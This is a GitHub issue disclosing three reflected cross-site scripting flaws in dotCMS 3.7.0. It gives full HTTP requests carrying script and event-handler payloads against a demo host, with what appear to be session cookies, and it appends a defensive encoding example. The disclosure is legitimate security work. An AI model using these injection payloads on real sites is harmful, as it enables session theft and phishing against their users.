
Multiple XSS in dotCMS - 3.7.0 #10643

Open
Belladona-c0re opened this issue Feb 6, 2017 · 0 comments
@Belladona-c0re commented Feb 6, 2017

The server reads data directly from the HTTP request and reflects it
back in the HTTP response. Reflected XSS exploits occur when an
attacker causes a victim to supply dangerous content to a vulnerable
web application, which is then reflected back to the victim and
executed by the web browser. The most common mechanism for delivering
malicious content is to include it as a parameter in a URL that is
posted publicly or e-mailed directly to the victim. URLs constructed
in this manner constitute the core of many phishing schemes, whereby
an attacker convinces a victim to visit a URL that refers to a
vulnerable site. After the site reflects the attacker's content back
to the victim, the content is executed by the victim's browser.

XSS CVE-2017-5875 (Authentication Necessary):

POST /dotCMS/myAccount HTTP/1.1
Host: demo.dotcms.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.dotcms.com/dotCMS/myAccount
Cookie: JSESSIONID=D95CD5DB89C287CEA2234432695E867A; opvc=848b4f88-adbd-40d6-a69b-d4160a8410fa; sitevisitscookie=1; dmid=1969f627-d1c7-4955-8c96-945a612bb883; _ga=GA1.2.2066223524.1486029583; _ga=GA1.3.2066223524.1486029583; SHARED_SESSION_ID=UYBDKCZQ6YF0; DWRSESSIONID=GEXwqywzgm8NFrjv8YRJNCHj*Dl; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 202

dispatch=editUserAddress&userId=%24%7BmyAccountForm.userId%7D&addressID=0q6rt0"><script>alert(1)<%2fscript>bewiz&prefix=other&firstName=Admin&lastName=User&suffix=&title=&emailAddress=admin%40dotcms.com&password=&newPassword=

XSS CVE-2017-5876:
GET /news-events/events/?date=2017-02-02yqqta"onmouseover%3d"alert(1)"style%3d"position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b"y5w4q&cat=3b8c53ec-f6ba-4b81-adef-6b7ed38a8490 HTTP/1.1

XSS CVE-2017-5877:

GET /about-us/locations/index?direction=testlr68w"onfocus%3d"alert(1)"autofocus%3d"d0mt3&milesR=500


How to fix: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
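The OWASP fix linked above is context-aware output encoding. The following is an added example (not dotCMS code, and not from the reporter) that takes the CVE-2017-5877 query string from this report and contrasts a hypothetical vulnerable render of the `direction` parameter with one that encodes it for the HTML attribute context it lands in; the `renderVulnerable`/`renderFixed` functions and the `<input>` markup are assumptions standing in for the real template.

```javascript
// Added example, not dotCMS code: output encoding for a reflected query
// parameter, checked against the request shown in the report above.

// Query string copied from the report's GET request (path omitted).
const REPORT_QUERY =
  'direction=testlr68w"onfocus%3d"alert(1)"autofocus%3d"d0mt3&milesR=500';

function directionFromQuery(query) {
  return new URLSearchParams(query).get("direction");
}

// Encode for a double-quoted HTML attribute value. These five characters
// are the ones that can end the value or open a new tag; nothing else is
// touched, so ordinary text survives unchanged.
function encodeForHtmlAttribute(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical vulnerable template: the parameter is reflected verbatim, so
// a quote inside it closes the value and the rest is parsed as attributes.
function renderVulnerable(direction) {
  return `<input name="direction" value="${direction}">`;
}

// Fixed template: encode at the point of output, for the attribute context.
function renderFixed(direction) {
  return `<input name="direction" value="${encodeForHtmlAttribute(direction)}">`;
}

// Defensive check on rendered markup: an on* attribute that starts right
// after a quote or whitespace means the reflected value escaped the attribute.
function hasInjectedHandler(html) {
  return /["\s]on[a-z]+\s*=/i.test(html);
}

// Render the reported parameter both ways and report the check for each.
function compare(query) {
  const direction = directionFromQuery(query);
  const vulnerable = renderVulnerable(direction);
  const fixed = renderFixed(direction);
  return {
    vulnerable,
    fixed,
    vulnerableInjected: hasInjectedHandler(vulnerable),
    fixedInjected: hasInjectedHandler(fixed),
  };
}
```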
